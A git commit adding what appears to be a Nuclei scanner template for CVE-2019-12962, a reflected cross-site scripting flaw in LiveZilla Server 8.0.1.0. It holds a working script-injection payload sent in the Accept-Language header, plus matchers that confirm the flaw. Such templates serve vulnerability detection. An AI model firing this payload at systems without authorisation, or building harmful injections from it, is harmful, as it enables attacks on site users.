Create CVE-2019-12962.yaml

patch-1
Mohsen khashei 2022-05-08 19:15:08 +04:30
parent 6f5cf7ee07
commit deb3d6c265
1 changed files with 32 additions and 0 deletions

View File

@ -0,0 +1,32 @@
id: CVE-2019-12962
info:
name: LiveZilla Server 8.0.1.0 XSS
author: Clment Cruchet
severity: medium
description: LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS
reference: https://www.exploit-db.com/exploits/49669
tags: cve,cve2019,livezilla,xss
requests:
- method: GET
headers:
Accept-Language: ';alert(document.domain)//
path:
- '{{BaseURL}}/mobile/index.php'
matchers-condition: and
matchers:
- type: word
words:
- "alert(document.domain)//"
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200